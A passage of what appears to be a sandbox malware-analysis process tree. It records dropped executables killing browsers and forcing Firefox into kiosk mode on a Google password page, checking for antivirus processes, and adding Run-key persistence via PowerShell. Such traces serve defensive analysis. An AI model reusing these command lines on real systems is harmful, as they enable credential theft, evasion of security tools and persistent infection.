C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:7740
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:7772
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361700101\34def43673.exe"C:\Users\Admin\AppData\Local\Temp\10361700101\34def43673.exe"3⤵PID:5976
-
-
C:\Users\Admin\AppData\Local\Temp\10361710101\e74a782ae2.exe"C:\Users\Admin\AppData\Local\Temp\10361710101\e74a782ae2.exe"3⤵PID:8376
-
-
C:\Users\Admin\AppData\Local\Temp\10361720101\4cbd79f85e.exe"C:\Users\Admin\AppData\Local\Temp\10361720101\4cbd79f85e.exe"3⤵PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\10361730101\b6e5b1e718.exe"C:\Users\Admin\AppData\Local\Temp\10361730101\b6e5b1e718.exe"3⤵PID:7860
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- Kills process with taskkill
PID:8920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- Kills process with taskkill
PID:7256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- Kills process with taskkill
PID:6724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- Kills process with taskkill
PID:4612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- Kills process with taskkill
PID:844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:11612
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵PID:11292
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1912 -prefsLen 27100 -prefMapHandle 1916 -prefMapSize 270279 -ipcHandle 1992 -initialChannelId {998b8115-952b-4e4c-b7ac-b3304414136f} -parentPid 11292 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11292" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:9284
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2460 -prefsLen 27136 -prefMapHandle 2464 -prefMapSize 270279 -ipcHandle 2480 -initialChannelId {31dbf0b5-ac08-4428-b3b1-fee09edca781} -parentPid 11292 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11292" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:12148
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3804 -prefsLen 25213 -prefMapHandle 3808 -prefMapSize 270279 -jsInitHandle 3812 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3820 -initialChannelId {730bcda8-7ae5-46c2-9074-da8b0e6520eb} -parentPid 11292 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11292" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵PID:604
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4016 -prefsLen 27326 -prefMapHandle 4020 -prefMapSize 270279 -ipcHandle 4028 -initialChannelId {319ca256-3106-4f10-b945-e69729009661} -parentPid 11292 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11292" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:6312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2856 -prefsLen 34825 -prefMapHandle 2820 -prefMapSize 270279 -jsInitHandle 3140 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3716 -initialChannelId {e71e7375-fb78-4afd-976c-0437825943a2} -parentPid 11292 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11292" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵PID:11284
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5208 -prefsLen 34906 -prefMapHandle 5212 -prefMapSize 270279 -ipcHandle 5076 -initialChannelId {a4eb1daa-db03-42e3-9e3d-ba26c8ab690a} -parentPid 11292 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11292" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵PID:10088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2488 -prefsLen 35013 -prefMapHandle 2532 -prefMapSize 270279 -ipcHandle 2756 -initialChannelId {22b3426f-1191-43e2-a606-2656c008bc18} -parentPid 11292 -crashReporter "\\.\pipe\gecko-crash-server-pipe.11292" -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 gpu6⤵PID:9008
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- Kills process with taskkill
PID:10296
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- Kills process with taskkill
PID:18660
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- Kills process with taskkill
PID:25140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- Kills process with taskkill
PID:5540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- Kills process with taskkill
PID:11528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:26356
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵PID:9496
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1916 -prefsLen 27100 -prefMapHandle 1920 -prefMapSize 270331 -ipcHandle 2008 -initialChannelId {19f2f8b6-ad99-4c3f-8134-f299aa99c200} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:25032
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2444 -prefsLen 27136 -prefMapHandle 2448 -prefMapSize 270331 -ipcHandle 2456 -initialChannelId {9778527a-60a7-4642-b87f-24b41c4cce02} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:25092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3344 -prefsLen 25164 -prefMapHandle 3348 -prefMapSize 270331 -jsInitHandle 3352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3360 -initialChannelId {e4128e5d-3705-47fc-954a-563dc9334d16} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵PID:26972
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3532 -prefsLen 27277 -prefMapHandle 3536 -prefMapSize 270331 -ipcHandle 3784 -initialChannelId {c0524671-6565-4ded-815d-3917afd852ce} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd6⤵PID:27080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3016 -prefsLen 34776 -prefMapHandle 3224 -prefMapSize 270331 -jsInitHandle 3228 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2744 -initialChannelId {49d13f96-44ad-4482-b185-333f9e8c076e} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab6⤵PID:27400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5252 -prefsLen 35013 -prefMapHandle 5256 -prefMapSize 270331 -ipcHandle 5264 -initialChannelId {03cf4586-c1cc-4a33-880c-e34f113e57fe} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility6⤵PID:28564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3004 -prefsLen 32952 -prefMapHandle 1096 -prefMapSize 270331 -jsInitHandle 1100 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4840 -initialChannelId {2b4ad403-6167-47c1-a237-87373730700a} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab6⤵PID:12008
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5604 -prefsLen 32952 -prefMapHandle 5608 -prefMapSize 270331 -jsInitHandle 5612 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5620 -initialChannelId {b4755ec9-984d-4c0f-aded-30654db60d88} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab6⤵PID:11048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5796 -prefsLen 32952 -prefMapHandle 5800 -prefMapSize 270331 -jsInitHandle 5804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5808 -initialChannelId {a0f98be5-4046-47c7-b016-3a3de6ef9970} -parentPid 9496 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9496" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab6⤵PID:4604
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361740101\5d20db759f.exe"C:\Users\Admin\AppData\Local\Temp\10361740101\5d20db759f.exe"3⤵PID:12260
-
-
C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe"3⤵PID:9580
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6056
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe"C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe"3⤵PID:8560
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:8540
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe"3⤵PID:18772
-
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵PID:25148
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:30352
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵PID:30368
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:34056
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:34068
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵PID:37156
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵PID:37596
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵PID:37748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10361780101\TbV75ZR.exe"3⤵PID:25432
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:25468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 25468 -s 5485⤵
- Program crash
PID:10008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10361790101\Rm3cVPI.exe"3⤵PID:1020
-
-
C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe"C:\Users\Admin\AppData\Local\Temp\10361800101\xZRvIQ5.exe"3⤵PID:25160
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:18808
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:25688
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10361810101\u75a1_003.exe"3⤵PID:25120
-
-
C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10361820101\EPTwCQd.exe"3⤵PID:27828
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:12084
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:11144
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5044
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:7164
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:5092
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2908 -ip 29081⤵PID:1992
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe"1⤵PID:1072
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe2⤵
- Executes dropped EXE
PID:3084 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe3⤵
- Executes dropped EXE
PID:988 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe4⤵
- Executes dropped EXE
PID:1124 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe5⤵
- Executes dropped EXE
PID:6272 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe6⤵
- Executes dropped EXE
PID:5484 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe7⤵
- Executes dropped EXE
PID:7800 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe8⤵
- Executes dropped EXE
PID:2528 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe9⤵
- Executes dropped EXE
PID:8284 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe10⤵
- Executes dropped EXE
PID:8664 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe11⤵
- Executes dropped EXE
PID:8964 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe12⤵
- Executes dropped EXE
PID:9132 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe13⤵
- Executes dropped EXE
PID:9224 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe14⤵
- Executes dropped EXE
PID:9308 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe15⤵
- Executes dropped EXE
PID:2892 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe16⤵
- Executes dropped EXE
PID:1152 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe17⤵
- Executes dropped EXE
PID:12404 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe18⤵
- Executes dropped EXE
PID:12216 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe19⤵
- Executes dropped EXE
PID:12072 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe20⤵
- Executes dropped EXE
PID:11976 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe21⤵PID:11684
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe22⤵PID:11124
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe23⤵PID:10976
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe24⤵PID:10888
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe25⤵PID:10764
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe26⤵PID:10688
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe27⤵PID:10588
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe28⤵PID:10272
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe29⤵PID:9664
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe30⤵PID:9564
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdaterw.exe"31⤵
- Modifies registry key
PID:9476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdaterw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe\"'"31⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe"1⤵PID:6296
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe2⤵PID:6404
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe3⤵PID:6492
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe4⤵PID:6576
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe5⤵PID:6648
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe6⤵PID:6732
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe7⤵PID:6832
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe8⤵PID:6892
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe9⤵PID:6968
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe10⤵PID:7060
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe11⤵PID:7144
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe12⤵PID:568
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe13⤵PID:2496
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe14⤵PID:7248
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe15⤵PID:7364
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe16⤵PID:7448
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe17⤵PID:7516
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_service.exe"18⤵
- Modifies registry key
PID:7644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe\"'"18⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7808
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe"1⤵PID:5752
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe2⤵PID:8224
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe3⤵PID:8292
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe4⤵PID:8372
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe5⤵PID:8460
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe6⤵PID:8580
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe7⤵PID:8676
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe8⤵PID:8764
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe9⤵PID:8840
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe10⤵PID:8968
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe11⤵PID:9080
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe12⤵PID:9172
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe13⤵PID:9280
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_service.exe"14⤵
- Modifies registry key
PID:9368
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:12544
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"1⤵PID:3540
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"1⤵PID:7252
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:11504
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{382e5649-98c0-4df1-a91e-1e45ed3578e9}\1f915f7e-e2b4-4cf4-8209-6d02194f4aef.cmd"1⤵PID:472
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6452
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8016
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
